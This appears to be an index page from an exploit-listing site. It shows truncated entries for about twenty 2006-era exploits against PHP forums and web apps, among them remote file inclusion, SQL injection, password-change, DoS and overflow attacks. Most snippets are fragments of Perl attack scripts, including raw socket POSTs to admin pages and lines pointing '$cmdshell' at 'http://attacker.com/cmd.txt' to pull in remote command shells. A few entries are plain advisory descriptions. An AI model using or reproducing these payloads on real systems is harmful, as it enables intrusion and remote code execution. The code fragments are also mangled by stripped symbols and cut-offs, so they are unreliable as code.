iPrimal Forums (admin/index.php) Change User Password Exploit

No description provided by source. !perl http://ipigroup.org/downloads/forums.zip Bl0od3r Germany shoutzz to all members of dC3 crew ,matrixkiller,eddie14 special to str0ke use IO::Socket; if @ARGV4 else &start ; sub start $host=$ARGV0; $path=$ARGV1; $user=$ARGV2; $passwd=$ARGV3;...

iPrimal Forums - '/admin/index.php' Change User Password

!perl http://ipigroup.org/downloads/forums.zip Bl0od3r Germany shoutzz to all members of dC3 crew ,matrixkiller,eddie14 special to str0ke use IO::Socket; if @ARGVnewProto="tcp",PeerAddr="$host",PeerPort="80" or die "Error"; print $sock "POST ".$path."admin/index.php?p=members&edit=".$user."...

Webdrivers Simple Forum (message_details.php) SQL Injection Exploit

Exploit for unknown platform in category web applications =================================================================== Webdrivers Simple Forum messagedetails.php SQL Injection Exploit =================================================================== !perl use IO::Socket; By:Bl0od3r Germa...

Essentia Web Server 2.15 (GET Request) Remote DoS Exploit

Exploit for unknown platform in category dos / poc ========================================================= Essentia Web Server 2.15 GET Request Remote DoS Exploit ========================================================= !/usr/bin/perl use IO::Socket; use Getopt::Std; getopts'h:', %args; if...

PHP News Reader <= 2.6.4 (phpbb.inc.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl PHP News Reader Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://pnews.sourceforge.net/ use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ====== Change This Li...

Exporia-0.3.0.txt

!/usr/bin/perl Script.............. :Exporia Discovered By.... : Root3rH3ll Location .......... : Iran Class.............. : Remote Original Advisory : http://Www.PersainFox.com & Www.Arashrj.ir We ArE : Root3rH3LL & Arash.Rj 0.3.0 Remote File Include Vulnerability .\n"; print ". .\n"; print...

BBSNew Index2.PHP Remote File Include Vulnerability

CVE-2006-5103 BBSNew Index2.PHP Remote File Include Vulnerability 成功利用这个漏洞可以让攻击者执行任意服务器端脚本代码进行电脑与特权的影响Web服务进程.这可能有助于擅自进入. bbsNew 2.0.1 暂无 !/usr/bin/perl bbsNew Class: Remote File Include Vulnerability Discovered By : Root3rH3LL = |\0073||-|311 Original Advisory : http://Www.PersainFox.coM Remote:...

SourceForge <= 1.0.4 (database.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl SourceForge-1.0.4 remote Command Execution Vulnerabilities Risk : High Remote Code Execution Url: http://lbdpc15.epfl.ch/ibd/IBD2000/SourceForge-1.0.4.tgz Exploit: http://site.com/path/include/database.php?sysdbtype=EvilScript coded and f0und3d by...

AlberT-EasySite PSA_PATH远程文件包含漏洞

AlberT-EasySite是一款基于PHP的站点生成系统。 AlberT-EasySite在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。 AlberT-EasySite没有正确地验证AES/modules/auth/phpsecurityadmin/include/logout.php文件中对PSAPATH参数的输入，允许攻击者通过包含本地或外部资源执行任意PHP代码。成功攻击要求打开了registerglobals。 AlberT AlberT-EasySite 1.0 AlberT AlberT-EasySite 0.8.12...

Asterisk <= 1.0.12 / 1.2.12.1 (chan_skinny) Remote Heap Overflow (PoC)

No description provided by source. !/usr/bin/perl Beyond Security Copyright Noam Rathaus [email protected] The following proof of concept causes the chanskippy to crash in different locations and due to memory corruption as well as double free calls, this is based on the finding of...

Casinosoft Casino Script 3.2 - config.php SQL Injection

Casinosoft Casino Script 3.2 - config.php SQL Injection source: https://www.securityfocus.com/bid/20646/info Casinosoft Casino Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue coul...

Free FAQ 1.0 - 'index.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/20621/info Free Faq is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with...

amazonia-rfi.txt

!/usr/bin/perl AMAZONIA MOD for phpbb forums Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.superphotos.info/AmazoniaMod.htm use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END"...

phpBB PlusXL 2.0_272 - 'constants.php' Remote File Inclusion

!/usr/bin/perl phpBB PlusXL 2.X biuld 272 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.xs4all.nl/hkick...

CommunityPortals 1.0 - 'import-archive.php' File Inclusion

!/usr/bin/perl CommunityPortals Build 12-31-18 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/11 Remote: Yes Type: high Site: http://www.leicestershirecommunity.com use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ====== Change This Line With Yo...

CommunityPortals 1.0 (import-archive.php) File Include Vulnerability

Exploit for unknown platform in category web applications ==================================================================== CommunityPortals 1.0 import-archive.php File Include Vulnerability ==================================================================== !/usr/bin/perl CommunityPortals...

Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion

Buzlas 2006-1 Full - ArchiveTopic.php Remote File Inclusion source: https://www.securityfocus.com/bid/20511/info Buzlas is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the...

PHP DocWriter <= 0.3 (script) Remote File Include Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - phpdocwriter = 0.3 script Remote File Include Exploit + + + - Script name: phpdocwriter v. 0.3 - Script site: http://phpdocwriter.sourceforge.net/ + + + - DEVIL TEAM IRC:...

TWiki 'filename' Parameter Traversal Arbitrary File Access

The version of TWiki running on the remote host allows directory traversal sequences in the 'filename' parameter in the viewfile function of 'lib/TWiki/UI/View.pm'. An unauthenticated attacker can exploit this issue to view arbitrary files on the remote host subject to the privileges of the web...

mercur-login.pl.txt

!/usr/bin/perl Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English version Perl script based on Sami FTP server remote exploit by Critical Security http://www.securityfocus.com/bid/17138 acaro at jervus.it use IO::Socket::INET; use Switch; if @ARGV 2 print...